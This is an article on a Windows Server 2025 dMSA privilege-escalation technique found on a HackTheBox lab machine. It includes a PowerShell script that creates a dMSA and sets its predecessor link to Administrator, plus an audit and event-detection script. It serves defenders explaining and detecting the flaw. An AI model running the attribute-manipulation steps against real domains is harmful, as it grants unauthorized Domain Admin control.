
New Privilege Escalation Technique Targets Windows Server 2025's dMSA Feature
A new privilege escalation technique has been identified on a HackTheBox machine named "Eighteen," targeting the delegated Managed Service Account (dMSA) feature introduced in Windows Server 2025. The technique abuses how Active Directory handles the attributes that record a dMSA's migration state, and it points to a potential weakness in the Windows Server 2025 dMSA design rather than a bug in a single host.
dMSAs are a new class of Active Directory service account with automatically managed passwords and SPNs, built so that an existing service account can be migrated to a dMSA that then "succeeds" it. The discovered technique manipulates the two attributes that encode this succession: msDS-ManagedAccountPrecededByLink, which points at the account the dMSA is replacing, and msDS-DelegatedMSAState, whose value 2 marks the migration as completed. An attacker who can write both attributes on a dMSA they control (for example, one they created in an OU where they hold CreateChild rights) can point the link at any domain account, including a member of Domain Admins. When the dMSA then authenticates, the KDC treats it as the successor of the linked account and issues a Kerberos Ticket Granting Ticket (TGT) that carries the linked account's identity and group memberships, so the attacker inherits its privileges without ever touching the target's password.
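The attribute manipulation described above, as an added PowerShell example that is not part of the original write-up. It assumes a throwaway lab domain (lab.local), an OU (OU=Staging) where the current user already holds CreateChild rights, and a target account named Administrator; all names are placeholders. It stops at the point where the dMSA claims to be the target's successor and does not request the TGT, which requires authenticating as the dMSA.

```powershell
# Added example, not from the original page. Lab-only: lab.local, OU=Staging and
# the account names are assumptions.
Import-Module ActiveDirectory

$ou     = 'OU=Staging,DC=lab,DC=local'
$name   = 'svc-migrate'
$target = Get-ADUser -Identity 'Administrator'   # account to be "succeeded"

# 1. Create the dMSA through plain LDAP (objectClass
#    msDS-DelegatedManagedServiceAccount). The creator becomes the owner of the
#    object, which is what grants write access to its attributes.
New-ADObject -Name $name -Type 'msDS-DelegatedManagedServiceAccount' -Path $ou `
    -OtherAttributes @{
        'dNSHostName'                   = "$name.lab.local"
        'msDS-SupportedEncryptionTypes' = 0x18     # AES128 + AES256
    }

$dmsa = Get-ADObject -Filter "name -eq '$name'" -SearchBase $ou

# 2. The two attributes the technique manipulates: the link names the account
#    being replaced, and state 2 means "migration completed".
Set-ADObject -Identity $dmsa -Replace @{
    'msDS-ManagedAccountPrecededByLink' = $target.DistinguishedName
    'msDS-DelegatedMSAState'            = 2
}

# 3. Read the attributes back. From here on, any TGT issued to the dMSA is
#    issued as the successor of the linked account.
Get-ADObject -Identity $dmsa -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState |
    Select-Object Name, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState
```

The write in step 2 is an ordinary LDAP modify; nothing in it validates that the caller is allowed to migrate the linked account, which is the whole problem. If the dMSA is created with New-ADObject instead of New-ADServiceAccount, no additional dMSA-specific privilege is consumed beyond CreateChild on the OU.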
While this technique was discovered in a lab environment, it underscores a potential weakness in the dMSA feature of Windows Server 2025 itself. In a production domain with at least one Windows Server 2025 domain controller, any principal able to create a dMSA or to write the two attributes on an existing one could obtain a TGT as a member of Domain Admins, which amounts to full control of the Active Directory environment.
To mitigate this, organizations should audit who can write msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState, and who holds CreateChild rights on OUs for the msDS-DelegatedManagedServiceAccount class (creating the object is the easiest way to gain write access to its attributes), and remove those rights from anyone who is not running an approved migration. Changes to the two attributes should be monitored: with Directory Service Changes auditing enabled and a SACL on the relevant OUs, each write produces event 5136 on the domain controller, and each new dMSA object produces event 5137. Additionally, organizations should exercise caution when deploying new features in Windows Server 2025 and conduct security assessments before enabling them.
This technique highlights the importance of meticulous attribute-level access control in Active Directory and the necessity of monitoring for the specific attribute changes that privilege escalation techniques depend on.
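An added PowerShell audit and detection script that implements the mitigation checks above; it is not part of the original write-up. It assumes the ActiveDirectory module, read access to the directory and, for the last step, that Directory Service Changes auditing is already enabled; the list of principals to ignore is an assumption and should be adjusted to the environment's tiering model.

```powershell
# Added example, not from the original page. Assumptions: ActiveDirectory module,
# read access to the forest, auditing already configured for step 3.
Import-Module ActiveDirectory

$dmsaClass = 'msDS-DelegatedManagedServiceAccount'
$watched   = 'msDS-ManagedAccountPrecededByLink', 'msDS-DelegatedMSAState'

# 1. Every dMSA that currently claims a predecessor account. A populated link
#    outside an approved migration window is a finding on its own.
Get-ADObject -LDAPFilter "(&(objectClass=$dmsaClass)(msDS-ManagedAccountPrecededByLink=*))" `
    -Properties $watched |
    Select-Object DistinguishedName, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState

# 2. Who can create dMSA objects in each OU, or write the two attributes.
#    CreateChild for the dMSA class, WriteProperty on either attribute, or any
#    broad right (GenericAll/GenericWrite/WriteDacl/WriteOwner) is enough.
$schemaNC  = (Get-ADRootDSE).schemaNamingContext
$classGuid = [guid](Get-ADObject -SearchBase $schemaNC -LDAPFilter "(ldapDisplayName=$dmsaClass)" -Properties schemaIDGUID).schemaIDGUID
$attrGuids = foreach ($a in $watched) {
    [guid](Get-ADObject -SearchBase $schemaNC -LDAPFilter "(ldapDisplayName=$a)" -Properties schemaIDGUID).schemaIDGUID
}
# Assumed list of principals expected to hold these rights; tune per environment.
$ignore = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
          "$env:USERDOMAIN\Domain Admins", "$env:USERDOMAIN\Enterprise Admins"
$R = [System.DirectoryServices.ActiveDirectoryRights]

Get-ADOrganizationalUnit -Filter * | ForEach-Object {
    $acl = Get-Acl -Path "AD:\$($_.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow' -or $ignore -contains $ace.IdentityReference.Value) { continue }
        $rights      = $ace.ActiveDirectoryRights
        $anyObject   = $ace.ObjectType -eq [guid]::Empty
        $createsDmsa = ($rights -band $R::CreateChild)   -and ($anyObject -or $ace.ObjectType -eq $classGuid)
        $writesAttr  = ($rights -band $R::WriteProperty) -and ($anyObject -or $attrGuids -contains $ace.ObjectType)
        $broad       = $rights -band ($R::GenericAll -bor $R::GenericWrite -bor $R::WriteDacl -bor $R::WriteOwner)
        if ($createsDmsa -or $writesAttr -or $broad) {
            [pscustomobject]@{
                OU        = $_.DistinguishedName
                Principal = $ace.IdentityReference.Value
                Rights    = $rights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# 3. Detection on a domain controller: event 5136 (object modified) names the
#    attribute written; 5137 (object created) catches new dMSA objects.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136, 5137 } -MaxEvents 1000 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'msDS-ManagedAccountPrecededByLink|msDS-DelegatedMSAState|msDS-DelegatedManagedServiceAccount' } |
    Select-Object TimeCreated, Id, @{ n = 'Message'; e = { $_.Message -replace '\s+', ' ' } }
```

Step 2 reports the OU-level ACEs that grant the access the technique needs; inherited ACEs are included because a right granted high in the tree applies to every OU below it. Step 3 only returns results if the domain controllers audit directory service changes and the OUs carry a SACL for those object and attribute types, so confirm both before relying on the query in a detection rule.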